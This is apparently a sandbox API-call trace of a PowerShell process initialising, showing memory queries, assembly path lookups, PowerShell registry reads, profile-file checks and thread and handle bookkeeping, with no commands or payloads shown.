	[0425.618] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.869] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.869] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.869] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.869] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.870] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.870] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.870] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.870] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.870] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.870] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.870] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.870] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.870] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.870] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.870] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.870] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.871] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.871] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.871] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.871] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0425.871] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.871] CoTaskMemFree (pv=0x1b8ad620) 
	[0425.873] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0425.873] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.873] CoTaskMemFree (pv=0x1b8ad620) 
	[0425.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.888] VirtualQuery (in: lpAddress=0x20bc40, lpBuffer=0x20cb00, dwLength=0x30 | out: lpBuffer=0x20cb00*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.893] VirtualQuery (in: lpAddress=0x20bc40, lpBuffer=0x20cb00, dwLength=0x30 | out: lpBuffer=0x20cb00*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.893] VirtualQuery (in: lpAddress=0x20b490, lpBuffer=0x20c350, dwLength=0x30 | out: lpBuffer=0x20c350*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.893] VirtualQuery (in: lpAddress=0x20b490, lpBuffer=0x20c350, dwLength=0x30 | out: lpBuffer=0x20c350*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.893] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20da98 | out: phkResult=0x20da98*=0x394) returned 0x0
	[0425.894] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20da1c, lpData=0x0, lpcbData=0x20da18*=0x0 | out: lpType=0x20da1c*=0x1, lpData=0x0, lpcbData=0x20da18*=0x56) returned 0x0
	[0425.894] CoTaskMemAlloc (cb=0x5a) returned 0x1b8c5400
	[0425.894] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d9ec, lpData=0x1b8c5400, lpcbData=0x20d9e8*=0x56 | out: lpType=0x20d9ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d9e8*=0x56) returned 0x0
	[0425.894] CoTaskMemFree (pv=0x1b8c5400) 
	[0425.894] RegCloseKey (hKey=0x394) returned 0x0
	[0425.894] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20da98 | out: phkResult=0x20da98*=0x394) returned 0x0
	[0425.894] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20da1c, lpData=0x0, lpcbData=0x20da18*=0x0 | out: lpType=0x20da1c*=0x1, lpData=0x0, lpcbData=0x20da18*=0x56) returned 0x0
	[0425.894] CoTaskMemAlloc (cb=0x5a) returned 0x1b8c5400
	[0425.894] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d9ec, lpData=0x1b8c5400, lpcbData=0x20d9e8*=0x56 | out: lpType=0x20d9ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d9e8*=0x56) returned 0x0
	[0425.894] CoTaskMemFree (pv=0x1b8c5400) 
	[0425.894] RegCloseKey (hKey=0x394) returned 0x0
	[0425.895] CoTaskMemAlloc (cb=0x20c) returned 0x1b896540
	[0425.895] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b896540 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0425.895] CoTaskMemFree (pv=0x1b896540) 
	[0425.895] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x20d650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0425.895] CoTaskMemAlloc (cb=0x20c) returned 0x1b896540
	[0425.895] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b896540 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0425.895] CoTaskMemFree (pv=0x1b896540) 
	[0425.895] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x20d650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0425.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x20d7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0425.895] SetErrorMode (uMode=0x1) returned 0x1
	[0425.896] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x20da00 | out: lpFileInformation=0x20da00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0425.896] SetErrorMode (uMode=0x1) returned 0x1
	[0425.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x20d7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0425.896] SetErrorMode (uMode=0x1) returned 0x1
	[0425.896] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x20da00 | out: lpFileInformation=0x20da00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0425.896] SetErrorMode (uMode=0x1) returned 0x1
	[0425.896] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x20d7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0425.896] SetErrorMode (uMode=0x1) returned 0x1
	[0425.896] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x20da00 | out: lpFileInformation=0x20da00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0425.896] SetErrorMode (uMode=0x1) returned 0x1
	[0425.896] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x20d7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0425.896] SetErrorMode (uMode=0x1) returned 0x1
	[0425.896] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x20da00 | out: lpFileInformation=0x20da00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0425.897] SetErrorMode (uMode=0x1) returned 0x1
	[0425.897] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0425.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.897] CoTaskMemFree (pv=0x1b8ad620) 
	[0425.897] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0425.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.897] CoTaskMemFree (pv=0x1b8ad620) 
	[0425.898] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0425.898] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.898] CoTaskMemFree (pv=0x1b8ad620) 
	[0425.928] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0425.928] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.928] CoTaskMemFree (pv=0x1b8ad620) 
	[0426.183] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0426.183] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.183] CoTaskMemFree (pv=0x1b8ad620) 
	[0426.184] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x394
	[0426.184] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x300
	[0426.185] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x304
	[0426.185] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x318
	[0426.185] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1c4
	[0426.185] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x32c
	[0426.185] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0426.185] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0426.185] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x338
	[0426.185] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x398
	[0426.185] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0426.185] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c
	[0426.187] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0426.187] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.187] CoTaskMemFree (pv=0x1b8ad620) 
	[0426.189] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0426.190] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x20dbe0 | out: lpMode=0x20dbe0) returned 1
	[0426.191] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0426.191] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.191] CoTaskMemFree (pv=0x1b8ad620) 
	[0426.194] SetEvent (hEvent=0x318) returned 1
	[0426.194] SetEvent (hEvent=0x394) returned 1
	[0426.194] SetEvent (hEvent=0x300) returned 1
	[0426.194] SetEvent (hEvent=0x304) returned 1
	[0426.195] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x350
	[0426.197] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0426.197] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.197] CoTaskMemFree (pv=0x1b8ad620) 
	[0426.198] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d938 | out: phkResult=0x20d938*=0x354) returned 0x0
	[0426.198] RegQueryValueExW (in: hKey=0x354, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x20d8bc, lpData=0x0, lpcbData=0x20d8b8*=0x0 | out: lpType=0x20d8bc*=0x0, lpData=0x0, lpcbData=0x20d8b8*=0x0) returned 0x2

Thread:
	id = 206
	os_tid = 0xc04


Thread:
	id = 229
	os_tid = 0xcb4


Thread:
	id = 466
	os_tid = 0x1158


Thread:
	id = 470
	os_tid = 0x116c


Thread:
	id = 484
	os_tid = 0x11f0


Thread:
	id = 495
	os_tid = 0x1238


Thread:
	id = 500
	os_tid = 0x1254

	[0377.457] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0406.399] LocalFree (hMem=0x2b72c0) returned 0x0
	[0406.400] CloseHandle (hObject=0x318) returned 1
	[0406.400] CloseHandle (hObject=0x13) returned 1
	[0406.400] CloseHandle (hObject=0xf) returned 1
	[0406.401] RegCloseKey (hKey=0x304) returned 0x0
	[0406.401] RegCloseKey (hKey=0x300) returned 0x0
	[0406.401] RegCloseKey (hKey=0x2fc) returned 0x0
	[0406.402] LocalFree (hMem=0x2b7290) returned 0x0
	[0406.402] RegCloseKey (hKey=0x1c0) returned 0x0
	[0411.377] RegCloseKey (hKey=0x1c0) returned 0x0
	[0414.659] RegCloseKey (hKey=0x2fc) returned 0x0
	[0422.538] RegCloseKey (hKey=0x390) returned 0x0
	[0422.538] RegCloseKey (hKey=0x38c) returned 0x0
	[0422.539] RegCloseKey (hKey=0x368) returned 0x0
	[0422.539] RegCloseKey (hKey=0x3a4) returned 0x0
	[0422.539] RegCloseKey (hKey=0x384) returned 0x0
	[0422.539] RegCloseKey (hKey=0x380) returned 0x0
	[0422.540] RegCloseKey (hKey=0x37c) returned 0x0
	[0422.540] RegCloseKey (hKey=0x378) returned 0x0
	[0422.540] RegCloseKey (hKey=0x374) returned 0x0
	[0422.540] RegCloseKey (hKey=0x370) returned 0x0
	[0422.541] RegCloseKey (hKey=0x36c) returned 0x0
	[0422.541] RegCloseKey (hKey=0x344) returned 0x0
	[0422.541] RegCloseKey (hKey=0x3a0) returned 0x0
	[0422.541] RegCloseKey (hKey=0x39c) returned 0x0
	[0422.541] RegCloseKey (hKey=0x364) returned 0x0
	[0422.542] RegCloseKey (hKey=0x360) returned 0x0
	[0422.542] RegCloseKey (hKey=0x35c) returned 0x0
	[0422.542] RegCloseKey (hKey=0x358) returned 0x0
	[0422.542] RegCloseKey (hKey=0x354) returned 0x0
	[0422.543] RegCloseKey (hKey=0x350) returned 0x0
	[0422.543] RegCloseKey (hKey=0x34c) returned 0x0
	[0422.543] RegCloseKey (hKey=0x348) returned 0x0
	[0422.543] RegCloseKey (hKey=0x398) returned 0x0
	[0422.544] RegCloseKey (hKey=0x338) returned 0x0
	[0422.544] RegCloseKey (hKey=0x334) returned 0x0
	[0422.544] RegCloseKey (hKey=0x330) returned 0x0
	[0422.544] RegCloseKey (hKey=0x32c) returned 0x0
	[0422.545] RegCloseKey (hKey=0x1c4) returned 0x0
	[0422.545] RegCloseKey (hKey=0x318) returned 0x0
	[0422.545] RegCloseKey (hKey=0x304) returned 0x0
	[0422.545] RegCloseKey (hKey=0x300) returned 0x0
	[0422.545] RegCloseKey (hKey=0x394) returned 0x0
	[0422.546] RegCloseKey (hKey=0x2fc) returned 0x0
	[0429.022] RegCloseKey (hKey=0x354) returned 0x0

Thread:
	id = 595
	os_tid = 0xacc


Thread:
	id = 670
	os_tid = 0x14d4

	[0426.445] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0426.449] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0426.454] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0426.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.454] CoTaskMemFree (pv=0x1b8ad620) 
